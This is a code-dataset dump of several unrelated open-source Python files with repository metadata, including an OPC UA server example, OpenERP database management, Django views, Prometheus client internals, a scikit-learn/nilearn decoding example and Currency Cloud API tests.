self.rootWidget = rootQueue.get()
# load source and correspond to graphical objects
self.kvfile = KvFile(path)
if(self.rootWidget is None):
raise Exception("Failed to load file")
else:
self.kvfile.rootRule.populate(self.rootWidget)
print("Parsed and corresponded kv file:")
print("\n".join(map(str, self.kvfile.elements)))
@ErrorHandler
def saveFile(self):
if(self.kvfile is None):
raise Exception("No file open")
self.kvfile.save()
def demo(path, rootQueue):
'''Event loop for demo application
path: the .kv file to load
rootQueue: a Queue that the root widget should be pushed onto (or None if creation fails)
'''
def _build():
try:
root = kivy.lang.Builder.load_file(path)
rootQueue.put(root)
return root
except:
rootQueue.put(None)
raise
app = kivy.app.App()
app.build = _build
app.run()
| gpl-2.0 | 8,181,468,927,837,841,000 | 24.577778 | 93 | 0.619461 | false |
alkor/python-opcua | examples/minimal-server-with-encryption.py | 1 | 1176 | import sys
sys.path.insert(0, "..")
import time
from opcua import ua, Server
if __name__ == "__main__":
# setup our server
server = Server()
server.set_endpoint("opc.tcp://0.0.0.0:4841/freeopcua/server/")
# load server certificate and private key. This enables endpoints
# with signing and encryption.
server.load_certificate("example-certificate.der")
server.load_private_key("example-private-key.pem")
# setup our own namespace, not really necessary but should as spec
uri = "http://examples.freeopcua.github.io"
idx = server.register_namespace(uri)
# get Objects node, this is where we should put our custom stuff
objects = server.get_objects_node()
# populating our address space
myobj = objects.add_object(idx, "MyObject")
myvar = myobj.add_variable(idx, "MyVariable", 6.7)
myvar.set_writable() # Set MyVariable to be writable by clients
# starting!
server.start()
try:
count = 0
while True:
time.sleep(1)
count += 0.1
myvar.set_value(count)
finally:
#close connection, remove subcsriptions, etc
server.stop()
| lgpl-3.0 | -747,732,777,772,497,200 | 27 | 70 | 0.644558 | false |
ttfseiko/openerp-trunk | openerp/service/db.py | 1 | 14915 | # -*- coding: utf-8 -*-
from contextlib import closing
from functools import wraps
import logging
import os
import shutil
import threading
import traceback
import tempfile
import zipfile
import psycopg2
import openerp
from openerp import SUPERUSER_ID
import openerp.release
import openerp.sql_db
import openerp.tools
import security
_logger = logging.getLogger(__name__)
self_actions = {}
self_id = 0
self_id_protect = threading.Semaphore()
# This should be moved to openerp.modules.db, along side initialize().
def _initialize_db(id, db_name, demo, lang, user_password):
try:
self_actions[id]['progress'] = 0
db = openerp.sql_db.db_connect(db_name)
with closing(db.cursor()) as cr:
# TODO this should be removed as it is done by RegistryManager.new().
openerp.modules.db.initialize(cr)
openerp.tools.config['lang'] = lang
cr.commit()
registry = openerp.modules.registry.RegistryManager.new(
db_name, demo, self_actions[id], update_module=True)
with closing(db.cursor()) as cr:
if lang:
modobj = registry['ir.module.module']
mids = modobj.search(cr, SUPERUSER_ID, [('state', '=', 'installed')])
modobj.update_translations(cr, SUPERUSER_ID, mids, lang)
# update admin's password and lang
values = {'password': user_password, 'lang': lang}
registry['res.users'].write(cr, SUPERUSER_ID, [SUPERUSER_ID], values)
cr.execute('SELECT login, password FROM res_users ORDER BY login')
self_actions[id].update(users=cr.dictfetchall(), clean=True)
cr.commit()
except Exception, e:
self_actions[id].update(clean=False, exception=e)
_logger.exception('CREATE DATABASE failed:')
self_actions[id]['traceback'] = traceback.format_exc()
def dispatch(method, params):
if method in ['create', 'get_progress', 'drop', 'dump', 'restore', 'rename',
'change_admin_password', 'migrate_databases',
'create_database', 'duplicate_database']:
passwd = params[0]
params = params[1:]
security.check_super(passwd)
elif method in ['db_exist', 'list', 'list_lang', 'server_version']:
# params = params
# No security check for these methods
pass
else:
raise KeyError("Method not found: %s" % method)
fn = globals()['exp_' + method]
return fn(*params)
def _create_empty_database(name):
db = openerp.sql_db.db_connect('postgres')
with closing(db.cursor()) as cr:
chosen_template = openerp.tools.config['db_template']
cr.execute("SELECT datname FROM pg_database WHERE datname = %s",
(name,))
if cr.fetchall():
raise openerp.exceptions.Warning("database %r already exists!" % (name,))
else:
cr.autocommit(True) # avoid transaction block
cr.execute("""CREATE DATABASE "%s" ENCODING 'unicode' TEMPLATE "%s" """ % (name, chosen_template))
def exp_create(db_name, demo, lang, user_password='admin'):
self_id_protect.acquire()
global self_id
self_id += 1
id = self_id
self_id_protect.release()
self_actions[id] = {'clean': False}
_create_empty_database(db_name)
_logger.info('CREATE DATABASE %s', db_name.lower())
create_thread = threading.Thread(target=_initialize_db,
args=(id, db_name, demo, lang, user_password))
create_thread.start()
self_actions[id]['thread'] = create_thread
return id
def exp_create_database(db_name, demo, lang, user_password='admin'):
""" Similar to exp_create but blocking."""
self_id_protect.acquire()
global self_id
self_id += 1
id = self_id
self_id_protect.release()
self_actions[id] = {'clean': False}
_logger.info('Create database `%s`.', db_name)
_create_empty_database(db_name)
_initialize_db(id, db_name, demo, lang, user_password)
return True
def exp_duplicate_database(db_original_name, db_name):
_logger.info('Duplicate database `%s` to `%s`.', db_original_name, db_name)
openerp.sql_db.close_db(db_original_name)
db = openerp.sql_db.db_connect('postgres')
with closing(db.cursor()) as cr:
cr.autocommit(True) # avoid transaction block
cr.execute("""CREATE DATABASE "%s" ENCODING 'unicode' TEMPLATE "%s" """ % (db_name, db_original_name))
return True
def exp_get_progress(id):
if self_actions[id]['thread'].isAlive():
# return openerp.modules.init_progress[db_name]
return min(self_actions[id].get('progress', 0), 0.95), []
else:
clean = self_actions[id]['clean']
if clean:
users = self_actions[id]['users']
for user in users:
# Remove the None passwords as they can't be marshalled by XML-RPC.
if user['password'] is None:
user['password'] = ''
self_actions.pop(id)
return 1.0, users
else:
a = self_actions.pop(id)
exc, tb = a['exception'], a['traceback']
raise Exception, exc, tb
def exp_drop(db_name):
if db_name not in exp_list(True):
return False
openerp.modules.registry.RegistryManager.delete(db_name)
openerp.sql_db.close_db(db_name)
db = openerp.sql_db.db_connect('postgres')
with closing(db.cursor()) as cr:
cr.autocommit(True) # avoid transaction block
# Try to terminate all other connections that might prevent
# dropping the database
try:
# PostgreSQL 9.2 renamed pg_stat_activity.procpid to pid:
# http://www.postgresql.org/docs/9.2/static/release-9-2.html#AEN110389
pid_col = 'pid' if cr._cnx.server_version >= 90200 else 'procpid'
cr.execute("""SELECT pg_terminate_backend(%(pid_col)s)
FROM pg_stat_activity
WHERE datname = %%s AND
%(pid_col)s != pg_backend_pid()""" % {'pid_col': pid_col},
(db_name,))
except Exception:
pass
try:
cr.execute('DROP DATABASE "%s"' % db_name)
except Exception, e:
_logger.error('DROP DB: %s failed:\n%s', db_name, e)
raise Exception("Couldn't drop database %s: %s" % (db_name, e))
else:
_logger.info('DROP DB: %s', db_name)
return True
def _set_pg_password_in_environment(func):
""" On systems where pg_restore/pg_dump require an explicit
password (i.e. when not connecting via unix sockets, and most
importantly on Windows), it is necessary to pass the PG user
password in the environment or in a special .pgpass file.
This decorator handles setting
:envvar:`PGPASSWORD` if it is not already
set, and removing it afterwards.
See also http://www.postgresql.org/docs/8.4/static/libpq-envars.html
.. note:: This is not thread-safe, and should never be enabled for
SaaS (giving SaaS users the super-admin password is not a good idea
anyway)
"""
@wraps(func)
def wrapper(*args, **kwargs):
if os.environ.get('PGPASSWORD') or not openerp.tools.config['db_password']:
return func(*args, **kwargs)
else:
os.environ['PGPASSWORD'] = openerp.tools.config['db_password']
try:
return func(*args, **kwargs)
finally:
del os.environ['PGPASSWORD']
return wrapper
def exp_dump(db_name):
with tempfile.TemporaryFile() as t:
dump_db(db_name, t)
t.seek(0)
return t.read().encode('base64')
@_set_pg_password_in_environment
def dump_db(db, stream):
"""Dump database `db` into file-like object `stream`"""
with openerp.tools.osutil.tempdir() as dump_dir:
registry = openerp.modules.registry.RegistryManager.get(db)
with registry.cursor() as cr:
filestore = registry['ir.attachment']._filestore(cr, SUPERUSER_ID)
if os.path.exists(filestore):
shutil.copytree(filestore, os.path.join(dump_dir, 'filestore'))
dump_file = os.path.join(dump_dir, 'dump.sql')
cmd = ['pg_dump', '--format=p', '--no-owner', '--file=' + dump_file]
if openerp.tools.config['db_user']:
cmd.append('--username=' + openerp.tools.config['db_user'])
if openerp.tools.config['db_host']:
cmd.append('--host=' + openerp.tools.config['db_host'])
if openerp.tools.config['db_port']:
cmd.append('--port=' + str(openerp.tools.config['db_port']))
cmd.append(db)
if openerp.tools.exec_pg_command(*cmd):
_logger.error('DUMP DB: %s failed! Please verify the configuration of the database '
'password on the server. You may need to create a .pgpass file for '
'authentication, or specify `db_password` in the server configuration '
'file.', db)
raise Exception("Couldn't dump database")
openerp.tools.osutil.zip_dir(dump_dir, stream, include_dir=False)
_logger.info('DUMP DB successful: %s', db)
def exp_restore(db_name, data, copy=False):
data_file = tempfile.NamedTemporaryFile(delete=False)
try:
data_file.write(data.decode('base64'))
data_file.close()
restore_db(db_name, data_file.name, copy=copy)
finally:
os.unlink(data_file.name)
return True
@_set_pg_password_in_environment
def restore_db(db, dump_file, copy=False):
assert isinstance(db, basestring)
if exp_db_exist(db):
_logger.warning('RESTORE DB: %s already exists', db)
raise Exception("Database already exists")
_create_empty_database(db)
filestore_path = None
with openerp.tools.osutil.tempdir() as dump_dir:
if zipfile.is_zipfile(dump_file):
# v8 format
with zipfile.ZipFile(dump_file, 'r') as z:
# only extract known members!
filestore = [m for m in z.namelist() if m.startswith('filestore/')]
z.extractall(dump_dir, ['dump.sql'] + filestore)
if filestore:
filestore_path = os.path.join(dump_dir, 'filestore')
pg_cmd = 'psql'
pg_args = ['-q', '-f', os.path.join(dump_dir, 'dump.sql')]
else:
# <= 7.0 format (raw pg_dump output)
pg_cmd = 'pg_restore'
pg_args = ['--no-owner', dump_file]
args = []
if openerp.tools.config['db_user']:
args.append('--username=' + openerp.tools.config['db_user'])
if openerp.tools.config['db_host']:
args.append('--host=' + openerp.tools.config['db_host'])
if openerp.tools.config['db_port']:
args.append('--port=' + str(openerp.tools.config['db_port']))
args.append('--dbname=' + db)
pg_args = args + pg_args
if openerp.tools.exec_pg_command(pg_cmd, *pg_args):
raise Exception("Couldn't restore database")
registry = openerp.modules.registry.RegistryManager.new(db)
with registry.cursor() as cr:
if copy:
# if it's a copy of a database, force generation of a new dbuuid
registry['ir.config_parameter'].init(cr, force=True)
if filestore_path:
filestore_dest = registry['ir.attachment']._filestore(cr, SUPERUSER_ID)
shutil.move(filestore_path, filestore_dest)
if openerp.tools.config['unaccent']:
try:
with cr.savepoint():
cr.execute("CREATE EXTENSION unaccent")
except psycopg2.Error:
pass
_logger.info('RESTORE DB: %s', db)
def exp_rename(old_name, new_name):
openerp.modules.registry.RegistryManager.delete(old_name)
openerp.sql_db.close_db(old_name)
db = openerp.sql_db.db_connect('postgres')
with closing(db.cursor()) as cr:
cr.autocommit(True) # avoid transaction block
try:
cr.execute('ALTER DATABASE "%s" RENAME TO "%s"' % (old_name, new_name))
_logger.info('RENAME DB: %s -> %s', old_name, new_name)
except Exception, e:
_logger.error('RENAME DB: %s -> %s failed:\n%s', old_name, new_name, e)
raise Exception("Couldn't rename database %s to %s: %s" % (old_name, new_name, e))
return True
@openerp.tools.mute_logger('openerp.sql_db')
def exp_db_exist(db_name):
## Not True: in fact, check if connection to database is possible. The database may exists
return bool(openerp.sql_db.db_connect(db_name))
def exp_list(document=False):
if not openerp.tools.config['list_db'] and not document:
raise openerp.exceptions.AccessDenied()
chosen_template = openerp.tools.config['db_template']
templates_list = tuple(set(['template0', 'template1', 'postgres', chosen_template]))
db = openerp.sql_db.db_connect('postgres')
with closing(db.cursor()) as cr:
try:
db_user = openerp.tools.config["db_user"]
if not db_user and os.name == 'posix':
import pwd
db_user = pwd.getpwuid(os.getuid())[0]
if not db_user:
cr.execute("select usename from pg_user where usesysid=(select datdba from pg_database where datname=%s)", (openerp.tools.config["db_name"],))
res = cr.fetchone()
db_user = res and str(res[0])
if db_user:
cr.execute("select datname from pg_database where datdba=(select usesysid from pg_user where usename=%s) and datname not in %s order by datname", (db_user, templates_list))
else:
cr.execute("select datname from pg_database where datname not in %s order by datname", (templates_list,))
res = [openerp.tools.ustr(name) for (name,) in cr.fetchall()]
except Exception:
res = []
res.sort()
return res
def exp_change_admin_password(new_password):
openerp.tools.config['admin_passwd'] = new_password
openerp.tools.config.save()
return True
def exp_list_lang():
return openerp.tools.scan_languages()
def exp_server_version():
""" Return the version of the server
Used by the client to verify the compatibility with its own version
"""
return openerp.release.version
def exp_migrate_databases(databases):
for db in databases:
_logger.info('migrate database %s', db)
openerp.tools.config['update']['base'] = True
openerp.modules.registry.RegistryManager.new(db, force_demo=False, update_module=True)
return True
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -292,634,373,570,825,700 | 37.74026 | 188 | 0.600268 | false |
rphlo/django-seuranta | seuranta/app/views.py | 1 | 2277 | from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.shortcuts import render, get_object_or_404
from django.utils.timezone import now
from seuranta.models import Competition
@login_required
def own_competitions(request):
user = request.user
comps = Competition.objects.filter(publisher=user)
return render(request,
'seuranta/own_competitions.html',
{'competitions': comps})
@login_required
def create_competition(request):
return render(request,
'seuranta/create_competition.html')
@login_required
def edit_competition(request, competition_id):
competition = get_object_or_404(Competition, id=competition_id)
if competition.publisher != request.user:
raise PermissionDenied
return render(request,
'seuranta/edit_competition.html',
{'competition': competition})
@login_required
def edit_map(request, competition_id):
competition = get_object_or_404(Competition, id=competition_id)
if competition.publisher != request.user:
raise PermissionDenied
return render(request,
'seuranta/edit_map.html',
{'competition': competition})
@login_required
def edit_competitors(request, competition_id):
competition = get_object_or_404(Competition, id=competition_id)
if competition.publisher != request.user:
raise PermissionDenied
return render(request,
'seuranta/edit_competitors.html',
{'competition': competition})
def list_competitions(request):
ts = now()
qs = Competition.objects.all()
live = qs.filter(
start_date__lte=ts,
end_date__gte=ts,
publication_policy="public"
).order_by('start_date')
upcoming = qs.filter(
start_date__gt=ts,
end_date__gt=ts,
publication_policy="public"
).order_by('start_date')
past = qs.filter(
start_date__lt=ts,
end_date__lt=ts,
publication_policy="public"
).order_by('-end_date')
return render(request,
'seuranta/list_competitions.html',
{'live': live, 'upcoming': upcoming, 'past': past})
| mit | -2,442,262,479,194,042,000 | 29.77027 | 69 | 0.646465 | false |
prometheus/client_python | prometheus_client/values.py | 1 | 4369 | from __future__ import unicode_literals
import os
from threading import Lock
import warnings
from .mmap_dict import mmap_key, MmapedDict
class MutexValue(object):
"""A float protected by a mutex."""
_multiprocess = False
def __init__(self, typ, metric_name, name, labelnames, labelvalues, **kwargs):
self._value = 0.0
self._lock = Lock()
def inc(self, amount):
with self._lock:
self._value += amount
def set(self, value):
with self._lock:
self._value = value
def get(self):
with self._lock:
return self._value
def MultiProcessValue(process_identifier=os.getpid):
"""Returns a MmapedValue class based on a process_identifier function.
The 'process_identifier' function MUST comply with this simple rule:
when called in simultaneously running processes it MUST return distinct values.
Using a different function than the default 'os.getpid' is at your own risk.
"""
files = {}
values = []
pid = {'value': process_identifier()}
# Use a single global lock when in multi-processing mode
# as we presume this means there is no threading going on.
# This avoids the need to also have mutexes in __MmapDict.
lock = Lock()
class MmapedValue(object):
"""A float protected by a mutex backed by a per-process mmaped file."""
_multiprocess = True
def __init__(self, typ, metric_name, name, labelnames, labelvalues, multiprocess_mode='', **kwargs):
self._params = typ, metric_name, name, labelnames, labelvalues, multiprocess_mode
# This deprecation warning can go away in a few releases when removing the compatibility
if 'prometheus_multiproc_dir' in os.environ and 'PROMETHEUS_MULTIPROC_DIR' not in os.environ:
os.environ['PROMETHEUS_MULTIPROC_DIR'] = os.environ['prometheus_multiproc_dir']
warnings.warn("prometheus_multiproc_dir variable has been deprecated in favor of the upper case naming PROMETHEUS_MULTIPROC_DIR", DeprecationWarning)
with lock:
self.__check_for_pid_change()
self.__reset()
values.append(self)
def __reset(self):
typ, metric_name, name, labelnames, labelvalues, multiprocess_mode = self._params
if typ == 'gauge':
file_prefix = typ + '_' + multiprocess_mode
else:
file_prefix = typ
if file_prefix not in files:
filename = os.path.join(
os.environ.get('PROMETHEUS_MULTIPROC_DIR'),
'{0}_{1}.db'.format(file_prefix, pid['value']))
files[file_prefix] = MmapedDict(filename)
self._file = files[file_prefix]
self._key = mmap_key(metric_name, name, labelnames, labelvalues)
self._value = self._file.read_value(self._key)
def __check_for_pid_change(self):
actual_pid = process_identifier()
if pid['value'] != actual_pid:
pid['value'] = actual_pid
# There has been a fork(), reset all the values.
for f in files.values():
f.close()
files.clear()
for value in values:
value.__reset()
def inc(self, amount):
with lock:
self.__check_for_pid_change()
self._value += amount
self._file.write_value(self._key, self._value)
def set(self, value):
with lock:
self.__check_for_pid_change()
self._value = value
self._file.write_value(self._key, self._value)
def get(self):
with lock:
self.__check_for_pid_change()
return self._value
return MmapedValue
def get_value_class():
# Should we enable multi-process mode?
# This needs to be chosen before the first metric is constructed,
# and as that may be in some arbitrary library the user/admin has
# no control over we use an environment variable.
if 'prometheus_multiproc_dir' in os.environ or 'PROMETHEUS_MULTIPROC_DIR' in os.environ:
return MultiProcessValue()
else:
return MutexValue
ValueClass = get_value_class()
| apache-2.0 | 4,736,157,789,706,635,000 | 34.811475 | 165 | 0.590753 | false |
ownport/local-ci | local_ci/travis.py | 1 | 2167 | # -*- coding: utf-8 -*-
import os
import re
import utils
from dispatchers import BaseDispatcher
BASH_SCRIPT_TEMPLATE='''#!/bin/bash'''
RE_ENV_PATTERN=re.compile(r'^.+?=.+?$')
CI_STAGES = [
'before_install', 'install',
'before_script', 'script',
'after_success', 'after_failure',
'before_deploy', 'deploy', 'after_deploy',
'after_script',
]
SUPPORTED_CI_STAGES = [
'install',
'script',
]
class TravisRepoDispatcher(BaseDispatcher):
def __init__(self, path, settings):
super(TravisRepoDispatcher, self).__init__(path, settings)
self._travisyml_path = os.path.join(self.repo_path, '.travis.yml')
if not os.path.exists(self._travisyml_path):
raise IOError('The file .travis.yml does not exist in the directory %s' % self.repo_path)
self._travisyml = utils.read_yaml(self._travisyml_path)
def docker_images(self):
''' returns the list of docker images
'''
language = self._travisyml.get('language', None)
if not language:
raise RuntimeError("The language variable is missed in configuration files")
versions = self._travisyml.get(language, None)
if not versions:
raise RuntimeError("The variable is missed in configuration file, %s" % language)
return [self.get_docker_image(':'.join((language, str(ver))))
for ver in versions]
def script(self):
''' returns the script for execution in docker container
'''
script = ['#!/bin/sh',]
env_vars = list(self._travisyml.get('env', []))
env_vars.extend(list(self.settings.get('env', [])))
script.extend(['\n# Environment variables'])
script.extend([ "export %s" % e for e in env_vars if RE_ENV_PATTERN.match(e) ])
for stage in SUPPORTED_CI_STAGES:
stage_actions = self._travisyml.get(stage, None)
if stage == 'install':
stage_actions.append('cd /repo')
if stage_actions:
script.extend(['\n# Stage: %s' % stage,])
script.extend(stage_actions)
return '\n'.join(script)
| apache-2.0 | 3,065,606,958,559,906,000 | 28.283784 | 101 | 0.595293 | false |
alfa-jor/addon | plugin.video.alfa/servers/gvideo.py | 1 | 2665 | # -*- coding: utf-8 -*-
import urllib
from core import httptools
from core import scrapertools
from platformcode import logger
def test_video_exists(page_url):
if 'googleusercontent' in page_url:
return True, "" # desactivada verificación pq se encalla!
response = httptools.downloadpage(page_url, headers={"Referer": page_url})
global page
page = response
if "no+existe" in response.data or 'no existe.</p>' in response.data:
return False, "[gvideo] El video no existe o ha sido borrado"
if "Se+ha+excedido+el" in response.data:
return False, "[gvideo] Se ha excedido el número de reproducciones permitidas"
if "No+tienes+permiso" in response.data:
return False, "[gvideo] No tienes permiso para acceder a este video"
if "Se ha producido un error" in response.data:
return False, "[gvideo] Se ha producido un error en el reproductor de google"
if "No+se+puede+procesar+este" in response.data:
return False, "[gvideo] No se puede procesar este video"
if response.code == 429:
return False, "[gvideo] Demasiadas conexiones al servidor, inténtelo después"
return True, ""
def get_video_url(page_url, user="", password="", video_password=""):
logger.info()
video_urls = []
urls = []
streams =[]
logger.debug('page_url: %s'%page_url)
if 'googleusercontent' in page_url:
url = page_url
headers_string = httptools.get_url_headers(page_url, forced=True)
quality = scrapertools.find_single_match (url, '.itag=(\d+).')
if not quality:
quality = '59'
streams.append((quality, url))
else:
data = page.data
bloque= scrapertools.find_single_match(data, 'url_encoded_fmt_stream_map(.*)')
if bloque:
data = bloque
data = data.decode('unicode-escape', errors='replace')
data = urllib.unquote_plus(urllib.unquote_plus(data))
headers_string = httptools.get_url_headers(page_url, forced=True)
streams = scrapertools.find_multiple_matches(data,
'itag=(\d+)&url=(.*?)(?:;.*?quality=.*?(?:,|&)|&quality=.*?(?:,|&))')
itags = {'18': '360p', '22': '720p', '34': '360p', '35': '480p', '37': '1080p', '43': '360p', '59': '480p'}
for itag, video_url in streams:
if not video_url in urls:
video_url += headers_string
video_urls.append([itags.get(itag, ''), video_url])
urls.append(video_url)
video_urls.sort(key=lambda video_urls: int(video_urls[0].replace("p", "")))
return video_urls
| gpl-3.0 | 4,788,274,870,246,898,000 | 35.452055 | 122 | 0.606539 | false |
ainafp/nilearn | plot_haxby_different_estimators.py | 1 | 5881 | """
Different classifiers in decoding the Haxby dataset
=====================================================
Here we compare different classifiers on a visual object recognition
decoding task.
"""
import time
### Fetch data using nilearn dataset fetcher ################################
from nilearn import datasets
data_files = datasets.fetch_haxby(n_subjects=1)
# load labels
import numpy as np
labels = np.recfromcsv(data_files.session_target[0], delimiter=" ")
stimuli = labels['labels']
# identify resting state labels in order to be able to remove them
resting_state = stimuli == "rest"
# find names of remaining active labels
categories = np.unique(stimuli[resting_state == False])
# extract tags indicating to which acquisition run a tag belongs
session_labels = labels["chunks"][resting_state == False]
# Load the fMRI data
from nilearn.input_data import NiftiMasker
# For decoding, standardizing is often very important
masker = NiftiMasker(mask=data_files['mask_vt'][0], standardize=True)
masked_timecourses = masker.fit_transform(
data_files.func[0])[resting_state == False]
### Classifiers definition
# A support vector classifier
from sklearn.svm import SVC
svm = SVC(C=1., kernel="linear")
from sklearn.grid_search import GridSearchCV
# GridSearchCV is slow, but note that it takes an 'n_jobs' parameter that
# can significantly speed up the fitting process on computers with
# multiple cores
svm_cv = GridSearchCV(SVC(C=1., kernel="linear"),
param_grid={'C': [.1, .5, 1., 5., 10., 50., 100.]},
scoring='f1')
# The logistic regression
from sklearn.linear_model import LogisticRegression, RidgeClassifier, \
RidgeClassifierCV
logistic = LogisticRegression(C=1., penalty="l1")
logistic_50 = LogisticRegression(C=50., penalty="l1")
logistic_l2 = LogisticRegression(C=1., penalty="l2")
logistic_cv = GridSearchCV(LogisticRegression(C=1., penalty="l1"),
param_grid={'C': [.1, .5, 1., 5., 10., 50., 100.]},
scoring='f1')
logistic_l2_cv = GridSearchCV(LogisticRegression(C=1., penalty="l1"),
param_grid={'C': [.1, .5, 1., 5., 10., 50., 100.]},
scoring='f1')
ridge = RidgeClassifier()
ridge_cv = RidgeClassifierCV()
# Make a data splitting object for cross validation
from sklearn.cross_validation import LeaveOneLabelOut, cross_val_score
cv = LeaveOneLabelOut(session_labels)
classifiers = {'SVC': svm,
'SVC cv': svm_cv,
'log l1': logistic,
'log l1 50': logistic_50,
'log l1 cv': logistic_cv,
'log l2': logistic_l2,
'log l2 cv': logistic_l2_cv,
'ridge': ridge,
'ridge cv': ridge_cv}
classifiers_scores = {}
for classifier_name, classifier in sorted(classifiers.items()):
classifiers_scores[classifier_name] = {}
print 70 * '_'
for category in categories:
classification_target = stimuli[resting_state == False] == category
t0 = time.time()
classifiers_scores[classifier_name][category] = cross_val_score(
classifier,
masked_timecourses,
classification_target,
cv=cv, scoring="f1")
print "%10s: %14s -- scores: %1.2f +- %1.2f, time %.2fs" % (
classifier_name, category,
classifiers_scores[classifier_name][category].mean(),
classifiers_scores[classifier_name][category].std(),
time.time() - t0)
###############################################################################
# make a rudimentary diagram
import matplotlib.pyplot as plt
plt.figure()
tick_position = np.arange(len(categories))
plt.xticks(tick_position, categories, rotation=45)
for color, classifier_name in zip(
['b', 'c', 'm', 'g', 'y', 'k', '.5', 'r', '#ffaaaa'],
sorted(classifiers)):
score_means = [classifiers_scores[classifier_name][category].mean()
for category in categories]
plt.bar(tick_position, score_means, label=classifier_name,
width=.11, color=color)
tick_position = tick_position + .09
plt.ylabel('Classification accurancy (f1 score)')
plt.xlabel('Visual stimuli category')
plt.ylim(ymin=0)
plt.legend(loc='lower center', ncol=3)
plt.title('Category-specific classification accuracy for different classifiers')
plt.tight_layout()
###############################################################################
# Plot the face vs house map for the different estimators
# use the average EPI as a background
from nilearn import image
mean_epi = image.mean_img(data_files.func[0]).get_data()
# Restrict the decoding to face vs house
condition_mask = np.logical_or(stimuli == 'face', stimuli == 'house')
masked_timecourses = masked_timecourses[condition_mask[resting_state == False]]
stimuli = stimuli[condition_mask]
# Transform the stimuli to binary values
stimuli = (stimuli == 'face').astype(np.int)
for classifier_name, classifier in sorted(classifiers.items()):
classifier.fit(masked_timecourses, stimuli)
if hasattr(classifier, 'coef_'):
weights = classifier.coef_[0]
elif hasattr(classifier, 'best_estimator_'):
weights = classifier.best_estimator_.coef_[0]
else:
continue
weight_img = masker.inverse_transform(weights)
weight_map = weight_img.get_data()
plt.figure(figsize=(3, 5))
plt.imshow(np.rot90(mean_epi[..., 27]), interpolation='nearest',
cmap=plt.cm.gray)
vmax = max(-weight_map.min(), weight_map.max())
plt.imshow(np.rot90(
np.ma.masked_inside(weight_map[..., 27], -.001*vmax, .001*vmax)),
interpolation='nearest', vmax=vmax, vmin=-vmax)
plt.axis('off')
plt.title('%s: face vs house' % classifier_name)
plt.tight_layout()
plt.show()
| bsd-3-clause | -6,053,872,600,998,459,000 | 34.215569 | 80 | 0.627444 | false |
CurrencyCloud/currencycloud-python | tests/integration/test_conversions.py | 1 | 6688 | from betamax import Betamax
from currencycloud import Client, Config
from currencycloud.resources import *
class TestConversions:
def setup_method(self, method):
# TODO: To run against real server please delete ../fixtures/vcr_cassettes/* and replace
# login_id and api_key with valid credentials before running the tests
login_id = '[email protected]'
api_key = 'deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef'
environment = Config.ENV_DEMO
self.client = Client(login_id, api_key, environment)
def test_conversions_can_create(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/create')
conversion = self.client.conversions.create(buy_currency="EUR",
sell_currency="GBP",
fixed_side="buy",
amount="1000",
term_agreement="true")
assert conversion is not None
assert isinstance(conversion, Conversion)
assert conversion.id is not None
assert conversion.client_buy_amount == "1000.00"
def test_actions_can_find(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/find')
conversions = self.client.conversions.find(per_page=1)
assert conversions
assert len(conversions) == 1
conversion = conversions[0]
assert conversion is not None
assert isinstance(conversion, Conversion)
assert conversion.client_buy_amount == "1000.00"
def test_actions_can_retrieve(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/retrieve')
conversion = self.client.conversions.retrieve("a26ffc86-c0f6-45d8-8c1c-6a3e579ce974")
assert conversion is not None
assert isinstance(conversion, Conversion)
assert conversion.id == "a26ffc86-c0f6-45d8-8c1c-6a3e579ce974"
assert conversion.client_buy_amount == "1000.00"
def test_actions_can_cancel(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/cancel')
response = self.client.conversions.cancel("84033366-2135-4fc9-8016-41a7adba463e")
assert response is not None
assert response.conversion_id == "84033366-2135-4fc9-8016-41a7adba463e"
def test_actions_can_date_change(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/date_change')
response = self.client.conversions.date_change("d3c7d733-7c2f-443d-a082-4c728157b99f",
new_settlement_date="2019-04-02T13:00:00+00:00")
assert response is not None
assert response.conversion_id == "d3c7d733-7c2f-443d-a082-4c728157b99f"
assert response.new_settlement_date == "2019-04-02T13:00:00+00:00"
def test_actions_can_split(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/split')
response = self.client.conversions.split("d3c7d733-7c2f-443d-a082-4c728157b99f",
amount="100")
assert response is not None
assert response.parent_conversion.get("id") == "d3c7d733-7c2f-443d-a082-4c728157b99f"
assert response.child_conversion.get("id") is not None
def test_actions_can_split_preview(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/split_preview')
response = self.client.conversions.split_preview("c805aa35-9bd3-4afe-ade2-d341e551aa16",
amount="100")
assert response is not None
assert response.parent_conversion.get("id") == "c805aa35-9bd3-4afe-ade2-d341e551aa16"
assert response.child_conversion.get("sell_amount") == '100.00'
def test_actions_can_split_history(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/split_history')
response = self.client.conversions.split_history("c805aa35-9bd3-4afe-ade2-d341e551aa16")
assert response is not None
for element in response.child_conversions:
assert element.get('id') is not None
assert element.get('sell_amount') == '100.00'
assert element.get('short_reference') is not None
def test_actions_can_quote_date_change(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/quote_date_change')
response = self.client.conversions.date_change_quote('2b436517-619b-4abe-a591-821dd31b264f',
new_settlement_date='2018-10-29T16:30:00+00:00')
assert response is not None
assert response.conversion_id == '2b436517-619b-4abe-a591-821dd31b264f'
assert response.new_settlement_date == '2018-10-29T16:30:00+00:00'
def test_actions_can_quote_cancellation(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/cancellation_quote')
response = self.client.conversions.cancellation_quote('63298593-bd8d-455d-8ee8-2f85dd390f2f')
assert response is not None
assert response.amount is not None
assert response.currency is not None
assert response.event_date_time is not None
def test_action_can_retrieve_profit_and_loss(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/profit_and_loss')
response = self.client.conversions.profit_and_loss()
assert response is not None
for element in response:
assert element.account_id is not None
assert element.contact_id is not None
assert element.conversion_id is not None
assert element.event_type is not None
assert element.amount is not None
assert element.currency is not None
assert element.event_date_time is not None
| mit | 6,826,754,372,983,621,000 | 43.586667 | 113 | 0.615431 | false |
